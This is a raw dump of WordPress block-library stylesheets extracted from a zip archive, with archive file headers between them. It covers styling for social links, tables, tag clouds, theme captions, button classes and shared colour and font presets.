.wp-block-social-link-anchor:hover,.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor:visited{ color:currentColor; fill:currentColor; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link{ background-color:#f0f0f0; color:#444; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-amazon{ background-color:#f90; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-bandcamp{ background-color:#1ea0c3; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-behance{ background-color:#0757fe; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-bluesky{ background-color:#0a7aff; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-codepen{ background-color:#1e1f26; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-deviantart{ background-color:#02e49b; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-discord{ background-color:#5865f2; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-dribbble{ background-color:#e94c89; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-dropbox{ background-color:#4280ff; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-etsy{ background-color:#f45800; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-facebook{ background-color:#0866ff; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-fivehundredpx{ background-color:#000; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-flickr{ background-color:#0461dd; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-foursquare{ background-color:#e65678; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-github{ background-color:#24292d; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-goodreads{ background-color:#eceadd; color:#382110; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-google{ background-color:#ea4434; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-gravatar{ background-color:#1d4fc4; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-instagram{ background-color:#f00075; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-lastfm{ background-color:#e21b24; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-linkedin{ background-color:#0d66c2; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-mastodon{ background-color:#3288d4; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-medium{ background-color:#000; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-meetup{ background-color:#f6405f; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-patreon{ background-color:#000; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-pinterest{ background-color:#e60122; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-pocket{ background-color:#ef4155; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-reddit{ background-color:#ff4500; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-skype{ background-color:#0478d7; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-snapchat{ background-color:#fefc00; color:#fff; stroke:#000; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-soundcloud{ background-color:#ff5600; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-spotify{ background-color:#1bd760; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-telegram{ background-color:#2aabee; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-threads{ background-color:#000; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-tiktok{ background-color:#000; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-tumblr{ background-color:#011835; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-twitch{ background-color:#6440a4; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-twitter{ background-color:#1da1f2; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-vimeo{ background-color:#1eb7ea; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-vk{ background-color:#4680c2; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-wordpress{ background-color:#3499cd; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-whatsapp{ background-color:#25d366; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-x{ background-color:#000; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-yelp{ background-color:#d32422; color:#fff; } :where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-youtube{ background-color:red; color:#fff; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link{ background:none; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link svg{ height:1.25em; width:1.25em; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-amazon{ color:#f90; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-bandcamp{ color:#1ea0c3; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-behance{ color:#0757fe; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-bluesky{ color:#0a7aff; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-codepen{ color:#1e1f26; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-deviantart{ color:#02e49b; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-discord{ color:#5865f2; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-dribbble{ color:#e94c89; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-dropbox{ color:#4280ff; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-etsy{ color:#f45800; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-facebook{ color:#0866ff; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-fivehundredpx{ color:#000; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-flickr{ color:#0461dd; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-foursquare{ color:#e65678; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-github{ color:#24292d; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-goodreads{ color:#382110; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-google{ color:#ea4434; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-gravatar{ color:#1d4fc4; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-instagram{ color:#f00075; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-lastfm{ color:#e21b24; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-linkedin{ color:#0d66c2; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-mastodon{ color:#3288d4; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-medium{ color:#000; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-meetup{ color:#f6405f; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-patreon{ color:#000; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-pinterest{ color:#e60122; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-pocket{ color:#ef4155; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-reddit{ color:#ff4500; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-skype{ color:#0478d7; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-snapchat{ color:#fff; stroke:#000; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-soundcloud{ color:#ff5600; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-spotify{ color:#1bd760; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-telegram{ color:#2aabee; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-threads{ color:#000; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-tiktok{ color:#000; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-tumblr{ color:#011835; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-twitch{ color:#6440a4; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-twitter{ color:#1da1f2; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-vimeo{ color:#1eb7ea; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-vk{ color:#4680c2; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-whatsapp{ color:#25d366; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-wordpress{ color:#3499cd; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-x{ color:#000; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-yelp{ color:#d32422; } :where(.wp-block-social-links.is-style-logos-only) .wp-social-link-youtube{ color:red; } .wp-block-social-links.is-style-pill-shape .wp-social-link{ width:auto; } :root :where(.wp-block-social-links .wp-social-link a){ padding:.25em; } :root :where(.wp-block-social-links.is-style-logos-only .wp-social-link a){ padding:0; } :root :where(.wp-block-social-links.is-style-pill-shape .wp-social-link a){ padding-left:.6666666667em; padding-right:.6666666667em; } .wp-block-social-links:not(.has-icon-color):not(.has-icon-background-color) .wp-social-link-snapchat .wp-block-social-link-label{ color:#000; } .wp-block-spacer{ clear:both; } .wp-block-tag-cloud{ box-sizing:border-box; } .wp-block-tag-cloud.aligncenter{ justify-content:center; text-align:center; } .wp-block-tag-cloud a{ display:inline-block; margin-right:5px; } .wp-block-tag-cloud span{ display:inline-block; margin-left:5px; text-decoration:none; } :root :where(.wp-block-tag-cloud.is-style-outline){ display:flex; flex-wrap:wrap; gap:1ch; } :root :where(.wp-block-tag-cloud.is-style-outline a){ border:1px solid; font-size:unset !important; margin-right:0; padding:1ch 2ch; text-decoration:none !important; } .wp-block-table{ overflow-x:auto; } .wp-block-table table{ border-collapse:collapse; width:100%; } .wp-block-table thead{ border-bottom:3px solid; } .wp-block-table tfoot{ border-top:3px solid; } .wp-block-table td,.wp-block-table th{ border:1px solid; padding:.5em; } .wp-block-table .has-fixed-layout{ table-layout:fixed; width:100%; } .wp-block-table .has-fixed-layout td,.wp-block-table .has-fixed-layout th{ word-break:break-word; } .wp-block-table.aligncenter,.wp-block-table.alignleft,.wp-block-table.alignright{ display:table; width:auto; } .wp-block-table.aligncenter td,.wp-block-table.aligncenter th,.wp-block-table.alignleft td,.wp-block-table.alignleft th,.wp-block-table.alignright td,.wp-block-table.alignright th{ word-break:break-word; } .wp-block-table .has-subtle-light-gray-background-color{ background-color:#f3f4f5; } .wp-block-table .has-subtle-pale-green-background-color{ background-color:#e9fbe5; } .wp-block-table .has-subtle-pale-blue-background-color{ background-color:#e7f5fe; } .wp-block-table .has-subtle-pale-pink-background-color{ background-color:#fcf0ef; } .wp-block-table.is-style-stripes{ background-color:initial; border-collapse:inherit; border-spacing:0; } .wp-block-table.is-style-stripes tbody tr:nth-child(odd){ background-color:#f0f0f0; } .wp-block-table.is-style-stripes.has-subtle-light-gray-background-color tbody tr:nth-child(odd){ background-color:#f3f4f5; } .wp-block-table.is-style-stripes.has-subtle-pale-green-background-color tbody tr:nth-child(odd){ background-color:#e9fbe5; } .wp-block-table.is-style-stripes.has-subtle-pale-blue-background-color tbody tr:nth-child(odd){ background-color:#e7f5fe; } .wp-block-table.is-style-stripes.has-subtle-pale-pink-background-color tbody tr:nth-child(odd){ background-color:#fcf0ef; } .wp-block-table.is-style-stripes td,.wp-block-table.is-style-stripes th{ border-color:#0000; } .wp-block-table.is-style-stripes{ border-bottom:1px solid #f0f0f0; } .wp-block-table .has-border-color td,.wp-block-table .has-border-color th,.wp-block-table .has-border-color tr,.wp-block-table .has-border-color>*{ border-color:inherit; } .wp-block-table table[style*=border-top-color] tr:first-child,.wp-block-table table[style*=border-top-color] tr:first-child td,.wp-block-table table[style*=border-top-color] tr:first-child th,.wp-block-table table[style*=border-top-color]>*,.wp-block-table table[style*=border-top-color]>* td,.wp-block-table table[style*=border-top-color]>* th{ border-top-color:inherit; } .wp-block-table table[style*=border-top-color] tr:not(:first-child){ border-top-color:initial; } .wp-block-table table[style*=border-right-color] td:last-child,.wp-block-table table[style*=border-right-color] th,.wp-block-table table[style*=border-right-color] tr,.wp-block-table table[style*=border-right-color]>*{ border-right-color:inherit; } .wp-block-table table[style*=border-bottom-color] tr:last-child,.wp-block-table table[style*=border-bottom-color] tr:last-child td,.wp-block-table table[style*=border-bottom-color] tr:last-child th,.wp-block-table table[style*=border-bottom-color]>*,.wp-block-table table[style*=border-bottom-color]>* td,.wp-block-table table[style*=border-bottom-color]>* th{ border-bottom-color:inherit; } .wp-block-table table[style*=border-bottom-color] tr:not(:last-child){ border-bottom-color:initial; } .wp-block-table table[style*=border-left-color] td:first-child,.wp-block-table table[style*=border-left-color] th,.wp-block-table table[style*=border-left-color] tr,.wp-block-table table[style*=border-left-color]>*{ border-left-color:inherit; } .wp-block-table table[style*=border-style] td,.wp-block-table table[style*=border-style] th,.wp-block-table table[style*=border-style] tr,.wp-block-table table[style*=border-style]>*{ border-style:inherit; } .wp-block-table table[style*=border-width] td,.wp-block-table table[style*=border-width] th,.wp-block-table table[style*=border-width] tr,.wp-block-table table[style*=border-width]>*{ border-style:inherit; border-width:inherit; } :root :where(.wp-block-table-of-contents){ box-sizing:border-box; } .wp-block-term-count{ box-sizing:border-box; } :where(.wp-block-term-description){ box-sizing:border-box; margin-bottom:var(--wp--style--block-gap); margin-top:var(--wp--style--block-gap); } .wp-block-term-description p{ margin-bottom:0; margin-top:0; } .wp-block-term-name,.wp-block-term-template{ box-sizing:border-box; } .wp-block-term-template{ list-style:none; margin-bottom:0; margin-top:0; max-width:100%; padding:0; } .wp-block-text-columns,.wp-block-text-columns.aligncenter{ display:flex; } .wp-block-text-columns .wp-block-column{ margin:0 1em; padding:0; } .wp-block-text-columns .wp-block-column:first-child{ margin-left:0; } .wp-block-text-columns .wp-block-column:last-child{ margin-right:0; } .wp-block-text-columns.columns-2 .wp-block-column{ width:50%; } .wp-block-text-columns.columns-3 .wp-block-column{ width:33.3333333333%; } .wp-block-text-columns.columns-4 .wp-block-column{ width:25%; } pre.wp-block-verse{ overflow:auto; white-space:pre-wrap; } :where(pre.wp-block-verse){ font-family:inherit; } .wp-block-video{ box-sizing:border-box; } .wp-block-video video{ height:auto; vertical-align:middle; width:100%; } @supports (position:sticky){ .wp-block-video [poster]{ object-fit:cover; } } .wp-block-video.aligncenter{ text-align:center; } .wp-block-video :where(figcaption){ margin-bottom:1em; margin-top:.5em; } .editor-styles-wrapper,.entry-content{ counter-reset:footnotes; } a[data-fn].fn{ counter-increment:footnotes; display:inline-flex; font-size:smaller; text-decoration:none; text-indent:-9999999px; vertical-align:super; } a[data-fn].fn:after{ content:"[" counter(footnotes) "]"; float:left; text-indent:0; } :root{ --wp-block-synced-color:#7a00df; --wp-block-synced-color--rgb:122, 0, 223; --wp-bound-block-color:var(--wp-block-synced-color); --wp-editor-canvas-background:#ddd; --wp-admin-theme-color:#007cba; --wp-admin-theme-color--rgb:0, 124, 186; --wp-admin-theme-color-darker-10:#006ba1; --wp-admin-theme-color-darker-10--rgb:0, 107, 160.5; --wp-admin-theme-color-darker-20:#005a87; --wp-admin-theme-color-darker-20--rgb:0, 90, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ :root{ --wp-admin-border-width-focus:1.5px; } } .wp-element-button{ cursor:pointer; } :root .has-very-light-gray-background-color{ background-color:#eee; } :root .has-very-dark-gray-background-color{ background-color:#313131; } :root .has-very-light-gray-color{ color:#eee; } :root .has-very-dark-gray-color{ color:#313131; } :root .has-vivid-green-cyan-to-vivid-cyan-blue-gradient-background{ background:linear-gradient(135deg, #00d084, #0693e3); } :root .has-purple-crush-gradient-background{ background:linear-gradient(135deg, #34e2e4, #4721fb 50%, #ab1dfe); } :root .has-hazy-dawn-gradient-background{ background:linear-gradient(135deg, #faaca8, #dad0ec); } :root .has-subdued-olive-gradient-background{ background:linear-gradient(135deg, #fafae1, #67a671); } :root .has-atomic-cream-gradient-background{ background:linear-gradient(135deg, #fdd79a, #004a59); } :root .has-nightshade-gradient-background{ background:linear-gradient(135deg, #330968, #31cdcf); } :root .has-midnight-gradient-background{ background:linear-gradient(135deg, #020381, #2874fc); } :root{ --wp--preset--font-size--normal:16px; --wp--preset--font-size--huge:42px; } .has-regular-font-size{ font-size:1em; } .has-larger-font-size{ font-size:2.625em; } .has-normal-font-size{ font-size:var(--wp--preset--font-size--normal); } .has-huge-font-size{ font-size:var(--wp--preset--font-size--huge); } .has-text-align-center{ text-align:center; } .has-text-align-left{ text-align:left; } .has-text-align-right{ text-align:right; } .has-fit-text{ white-space:nowrap !important; } #end-resizable-editor-section{ display:none; } .aligncenter{ clear:both; } .items-justified-left{ justify-content:flex-start; } .items-justified-center{ justify-content:center; } .items-justified-right{ justify-content:flex-end; } .items-justified-space-between{ justify-content:space-between; } .screen-reader-text{ border:0; clip-path:inset(50%); height:1px; margin:-1px; overflow:hidden; padding:0; position:absolute; width:1px; word-wrap:normal !important; } .screen-reader-text:focus{ background-color:#ddd; clip-path:none; color:#444; display:block; font-size:1em; height:auto; left:5px; line-height:normal; padding:15px 23px 14px; text-decoration:none; top:5px; width:auto; z-index:100000; } html :where(.has-border-color){ border-style:solid; } html :where([style*=border-top-color]){ border-top-style:solid; } html :where([style*=border-right-color]){ border-right-style:solid; } html :where([style*=border-bottom-color]){ border-bottom-style:solid; } html :where([style*=border-left-color]){ border-left-style:solid; } html :where([style*=border-width]){ border-style:solid; } html :where([style*=border-top-width]){ border-top-style:solid; } html :where([style*=border-right-width]){ border-right-style:solid; } html :where([style*=border-bottom-width]){ border-bottom-style:solid; } html :where([style*=border-left-width]){ border-left-style:solid; } html :where(img[class*=wp-image-]){ height:auto; max-width:100%; } :where(figure){ margin:0 0 1em; } html :where(.is-position-sticky){ --wp-admin--admin-bar--position-offset:var(--wp-admin--admin-bar--height, 0px); } @media screen and (max-width:600px){ html :where(.is-position-sticky){ --wp-admin--admin-bar--position-offset:0px; } }PK!i}ل dist/block-library/theme.min.cssnuȯ.wp-block-audio :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-audio :where(figcaption){color:#ffffffa6}.wp-block-audio{margin:0 0 1em}.wp-block-code{border:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed :where(figcaption){color:#ffffffa6}.wp-block-embed{margin:0 0 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}:root :where(.wp-block-image figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme :root :where(.wp-block-image figcaption){color:#ffffffa6}.wp-block-image{margin:0 0 1em}.wp-block-pullquote{border-bottom:4px solid;border-top:4px solid;color:currentColor;margin-bottom:1.75em}.wp-block-pullquote :where(cite),.wp-block-pullquote :where(footer),.wp-block-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote:where(.has-text-align-right){border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote:where(.has-text-align-center){border:none;padding-left:0}.wp-block-quote.is-large,.wp-block-quote.is-style-large,.wp-block-quote:where(.is-style-plain){border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}:where(.wp-block-group.has-background){padding:1.25em 2.375em}.wp-block-separator.has-css-opacity{opacity:.4}.wp-block-separator{border:none;border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){border-bottom:none;height:1px}.wp-block-separator.has-background:not(.is-style-wide):not(.is-style-dots){height:2px}.wp-block-table{margin:0 0 1em}.wp-block-table td,.wp-block-table th{word-break:normal}.wp-block-table :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-table :where(figcaption){color:#ffffffa6}.wp-block-video :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video :where(figcaption){color:#ffffffa6}.wp-block-video{margin:0 0 1em}:root :where(.wp-block-template-part.has-background){margin-bottom:0;margin-top:0;padding:1.25em 2.375em}PK!< dist/block-library/theme.cssnuȯ.wp-block-audio :where(figcaption){ color:#555; font-size:13px; text-align:center; } .is-dark-theme .wp-block-audio :where(figcaption){ color:#ffffffa6; } .wp-block-audio{ margin:0 0 1em; } .wp-block-code{ border:1px solid #ccc; border-radius:4px; font-family:Menlo,Consolas,monaco,monospace; padding:.8em 1em; } .wp-block-embed :where(figcaption){ color:#555; font-size:13px; text-align:center; } .is-dark-theme .wp-block-embed :where(figcaption){ color:#ffffffa6; } .wp-block-embed{ margin:0 0 1em; } .blocks-gallery-caption{ color:#555; font-size:13px; text-align:center; } .is-dark-theme .blocks-gallery-caption{ color:#ffffffa6; } :root :where(.wp-block-image figcaption){ color:#555; font-size:13px; text-align:center; } .is-dark-theme :root :where(.wp-block-image figcaption){ color:#ffffffa6; } .wp-block-image{ margin:0 0 1em; } .wp-block-pullquote{ border-bottom:4px solid; border-top:4px solid; color:currentColor; margin-bottom:1.75em; } .wp-block-pullquote :where(cite),.wp-block-pullquote :where(footer),.wp-block-pullquote__citation{ color:currentColor; font-size:.8125em; font-style:normal; text-transform:uppercase; } .wp-block-quote{ border-left:.25em solid; margin:0 0 1.75em; padding-left:1em; } .wp-block-quote cite,.wp-block-quote footer{ color:currentColor; font-size:.8125em; font-style:normal; position:relative; } .wp-block-quote:where(.has-text-align-right){ border-left:none; border-right:.25em solid; padding-left:0; padding-right:1em; } .wp-block-quote:where(.has-text-align-center){ border:none; padding-left:0; } .wp-block-quote.is-large,.wp-block-quote.is-style-large,.wp-block-quote:where(.is-style-plain){ border:none; } .wp-block-search .wp-block-search__label{ font-weight:700; } .wp-block-search__button{ border:1px solid #ccc; padding:.375em .625em; } :where(.wp-block-group.has-background){ padding:1.25em 2.375em; } .wp-block-separator.has-css-opacity{ opacity:.4; } .wp-block-separator{ border:none; border-bottom:2px solid; margin-left:auto; margin-right:auto; } .wp-block-separator.has-alpha-channel-opacity{ opacity:1; } .wp-block-separator:not(.is-style-wide):not(.is-style-dots){ width:100px; } .wp-block-separator.has-background:not(.is-style-dots){ border-bottom:none; height:1px; } .wp-block-separator.has-background:not(.is-style-wide):not(.is-style-dots){ height:2px; } .wp-block-table{ margin:0 0 1em; } .wp-block-table td,.wp-block-table th{ word-break:normal; } .wp-block-table :where(figcaption){ color:#555; font-size:13px; text-align:center; } .is-dark-theme .wp-block-table :where(figcaption){ color:#ffffffa6; } .wp-block-video :where(figcaption){ color:#555; font-size:13px; text-align:center; } .is-dark-theme .wp-block-video :where(figcaption){ color:#ffffffa6; } .wp-block-video{ margin:0 0 1em; } :root :where(.wp-block-template-part.has-background){ margin-bottom:0; margin-top:0; padding:1.25em 2.375em; }PK!ZKYY&dist/block-library/editor-elements.cssnu[.wp-element-button{ cursor:revert; } .wp-element-button[role=textbox]{ cursor:text; }PK!)f"dist/block-library/classic.min.cssnuȯ.wp-block-button__link{background-color:#32373c;border-radius:9999px;box-shadow:none;color:#fff;font-size:1.125em;padding:calc(.667em + 2px) calc(1.333em + 2px);text-decoration:none}.wp-block-file__button{background:#32373c;color:#fff}.wp-block-accordion-heading{margin:0}.wp-block-accordion-heading__toggle{background-color:inherit!important;color:inherit!important}.wp-block-accordion-heading__toggle:not(:focus-visible){outline:none}.wp-block-accordion-heading__toggle:focus,.wp-block-accordion-heading__toggle:hover{background-color:inherit!important;border:none;box-shadow:none;color:inherit;padding:var(--wp--preset--spacing--20,1em) 0;text-decoration:none}.wp-block-accordion-heading__toggle:focus-visible{outline:auto;outline-offset:0}PK!7g$dist/block-library/reset-rtl.min.cssnuȯhtml :where(.editor-styles-wrapper){background:#fff;color:initial;font-family:serif;font-size:medium;line-height:normal}:where(.editor-styles-wrapper) .wp-align-wrapper{max-width:840px}:where(.editor-styles-wrapper) .wp-align-wrapper.wp-align-full,:where(.editor-styles-wrapper) .wp-align-wrapper>.wp-block{max-width:none}:where(.editor-styles-wrapper) .wp-align-wrapper.wp-align-wide{max-width:840px}:where(.editor-styles-wrapper) a{transition:none}:where(.editor-styles-wrapper) code,:where(.editor-styles-wrapper) kbd{background:inherit;font-family:monospace;font-size:inherit;margin:0;padding:0}:where(.editor-styles-wrapper) p{font-size:revert;line-height:revert;margin:revert}:where(.editor-styles-wrapper) ol,:where(.editor-styles-wrapper) ul{box-sizing:border-box;list-style-type:revert;margin:revert;padding:revert}:where(.editor-styles-wrapper) ol ol,:where(.editor-styles-wrapper) ol ul,:where(.editor-styles-wrapper) ul ol,:where(.editor-styles-wrapper) ul ul{margin:revert}:where(.editor-styles-wrapper) ol li,:where(.editor-styles-wrapper) ul li{margin:revert}:where(.editor-styles-wrapper) ol ul,:where(.editor-styles-wrapper) ul ul{list-style-type:revert}:where(.editor-styles-wrapper) h1,:where(.editor-styles-wrapper) h2,:where(.editor-styles-wrapper) h3,:where(.editor-styles-wrapper) h4,:where(.editor-styles-wrapper) h5,:where(.editor-styles-wrapper) h6{color:revert;font-size:revert;font-weight:revert;line-height:revert;margin:revert}:where(.editor-styles-wrapper) select{-webkit-appearance:revert;background:revert;border:revert;border-radius:revert;box-shadow:revert;color:revert;cursor:revert;font-family:system-ui;font-size:revert;font-weight:revert;line-height:revert;margin:revert;max-width:revert;min-height:revert;outline:revert;padding:revert;text-shadow:revert;transform:revert;vertical-align:revert}:where(.editor-styles-wrapper) select:disabled,:where(.editor-styles-wrapper) select:focus{background-color:revert;background-image:revert;border-color:revert;box-shadow:revert;color:revert;cursor:revert;text-shadow:revert;transform:revert}PK!`S J !dist/block-library/common.min.cssnuȯ:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.wp-element-button{cursor:pointer}:root .has-very-light-gray-background-color{background-color:#eee}:root .has-very-dark-gray-background-color{background-color:#313131}:root .has-very-light-gray-color{color:#eee}:root .has-very-dark-gray-color{color:#313131}:root .has-vivid-green-cyan-to-vivid-cyan-blue-gradient-background{background:linear-gradient(135deg,#00d084,#0693e3)}:root .has-purple-crush-gradient-background{background:linear-gradient(135deg,#34e2e4,#4721fb 50%,#ab1dfe)}:root .has-hazy-dawn-gradient-background{background:linear-gradient(135deg,#faaca8,#dad0ec)}:root .has-subdued-olive-gradient-background{background:linear-gradient(135deg,#fafae1,#67a671)}:root .has-atomic-cream-gradient-background{background:linear-gradient(135deg,#fdd79a,#004a59)}:root .has-nightshade-gradient-background{background:linear-gradient(135deg,#330968,#31cdcf)}:root .has-midnight-gradient-background{background:linear-gradient(135deg,#020381,#2874fc)}:root{--wp--preset--font-size--normal:16px;--wp--preset--font-size--huge:42px}.has-regular-font-size{font-size:1em}.has-larger-font-size{font-size:2.625em}.has-normal-font-size{font-size:var(--wp--preset--font-size--normal)}.has-huge-font-size{font-size:var(--wp--preset--font-size--huge)}.has-text-align-center{text-align:center}.has-text-align-left{text-align:left}.has-text-align-right{text-align:right}.has-fit-text{white-space:nowrap!important}#end-resizable-editor-section{display:none}.aligncenter{clear:both}.items-justified-left{justify-content:flex-start}.items-justified-center{justify-content:center}.items-justified-right{justify-content:flex-end}.items-justified-space-between{justify-content:space-between}.screen-reader-text{border:0;clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;word-wrap:normal!important}.screen-reader-text:focus{background-color:#ddd;clip-path:none;color:#444;display:block;font-size:1em;height:auto;left:5px;line-height:normal;padding:15px 23px 14px;text-decoration:none;top:5px;width:auto;z-index:100000}html :where(.has-border-color){border-style:solid}html :where([style*=border-top-color]){border-top-style:solid}html :where([style*=border-right-color]){border-right-style:solid}html :where([style*=border-bottom-color]){border-bottom-style:solid}html :where([style*=border-left-color]){border-left-style:solid}html :where([style*=border-width]){border-style:solid}html :where([style*=border-top-width]){border-top-style:solid}html :where([style*=border-right-width]){border-right-style:solid}html :where([style*=border-bottom-width]){border-bottom-style:solid}html :where([style*=border-left-width]){border-left-style:solid}html :where(img[class*=wp-image-]){height:auto;max-width:100%}:where(figure){margin:0 0 1em}html :where(.is-position-sticky){--wp-admin--admin-bar--position-offset:var(--wp-admin--admin-bar--height,0px)}@media screen and (max-width:600px){html :where(.is-position-sticky){--wp-admin--admin-bar--position-offset:0px}}PK!2[ 